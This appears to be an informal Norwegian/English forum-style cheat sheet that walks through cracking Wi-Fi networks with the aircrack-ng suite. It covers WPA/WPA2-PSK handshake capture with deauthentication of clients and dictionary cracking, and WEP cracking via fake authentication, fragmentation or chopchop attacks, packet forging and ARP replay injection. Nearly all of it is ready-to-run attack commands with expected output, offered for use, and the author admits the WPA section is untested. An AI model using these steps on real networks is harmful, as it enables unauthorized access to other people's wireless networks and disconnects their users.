Med utgangspunkt i nettverkskoret ditt støtter injectionmode.
ath0, wifi0 og alt det der kan varigere fra pc til pc (driver til driver)
WPA/WPA2 - PSK (PreSharedKey)
1.
airmon-ng stop ath0
iwconfig to confirme you have stopped all other athX interfaces as well
airmon-ng start wifi0
iwconfig to confirme ath0 is runnning in monitor mode
copy your MAC ADDRESS
2.
airodump-ng -c X --bssid AP:MAC:ADD:RE:SS -w psk ath0
channel to run on write to file "psk"
[ch X] [elapsed 4s] [Date, Time] [WPA handshake: AP:MAC:ADD:RE:SS]
----------------------------
Bssid PWR RXQ Beacons #data etc etc etc
3. Optional (active/none active)
aireplay-ng -0 1 -a AP:MAC:ADD:RE:SS -c Cl:IE:NT::MAC ath0
-0 deauth, 1 number of times
Might wanna check TCPDUMP for ACK packets, if none, GOTO 3
4.
aircrack-ng -w password.lst -b AP:MAC:ADD:RE:SS psk*.cap
word/password-list filename
output:
No valid WPA handshake (goto 3)
/
choosing first network as target
------------------------------
------------------------------
airmon-ng stop wifi0
airmon'ng start ath0
---------
ifconfig xxx down
ifconfig xxx up
iwconfig xxx mode managed
---------
wlanconfig ath0 destroy
ifconfig wifi0 down
ifconfig ath0 down
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 up
ifconfig wifi0 up
WEP WITHOUT CLIENT
1. Start in monitor mode
airmon-ng stop ath0
airmon-ng start wifi0
2. Fake authentication
aireplay-ng -1 0 -e essid (networkname) -a AP:MAC:ADD:RE:SS -h MY:MAC ath0
OR (for tricky AP)
aireplay-ng -1 6000 -o 1 -q 10 -e essid (network name) -a AP:MAC -h MY:MAC ath0
3. chopchop or fragmenation to obtain PRGA
fragmentation:
aireplay-ng -5 -b AP:MAC:ADD:RE:SS -h MY:MAC ath0
output:
Waiting for data packet...
read 127 packets...
Size: 114, FromDSS: 1, ToDS: 0 (WEP)
BSSID = AP:MAC then use packet!
output:
Saving chosen packet in replay~~~~.cap
Data pcket found
Sending fragmented pacet
got REPLAYED packet!!
Saving keystream in fragment~~~~.xor
chopchop:
aireplay-ng -4 -h MY:MAC -b AP:MAC ath0
output:
Same thing, if BSSID = AP:MAC use packet!
output:
offset 84 (1% done) | xor = HEX | PT = HEX | x frames in x ms
Saving plaintext in replay~~~~.cap
Saving keystream in replay~~~~.xor
To reuse halvdone packet:
aireplay-ng -4 ath0 -h MY:MAC -r replay~~~~.cap
4. Packetforge-ng to create arp packet from PRGA
packetforge-ng -0 -a AP:MAC -h MY:MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment~~~~.xor -w random-name
output:
wrote packet to random-name
5. start airodump-ng
airodump-ng -c X --bssid AP:MAC -w filename ath0
6. Inject arp-request (random-name)
aireplay-ng -2 -r random-name ath0
YES! use thing packet!
7. Run aircrack-ng
aircrack-ng -b AP:MAC capture*.cap
------------------------------
------------------------------
airmon-ng stop wifi0
airmon'ng start ath0
---------
ifconfig xxx down
ifconfig xxx up
iwconfig xxx mode managed
---------
wlanconfig ath0 destroy
ifconfig wifi0 down
ifconfig ath0 down
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 up
ifconfig wifi0 up
WEP MED KLIENTER
punkt 2,3,4 kan droppes om du har klienter logget på. sånn ca ihverfall..mulig det er litte grann anderledes da.
Denne har jeg brukt laaang tid på å redigere, så håper den funker
jeg har desverre bare fått testet WEP WITHOUT CLIENTS, så vet ikke hvor bra WPA tutorialen er!
God ferie!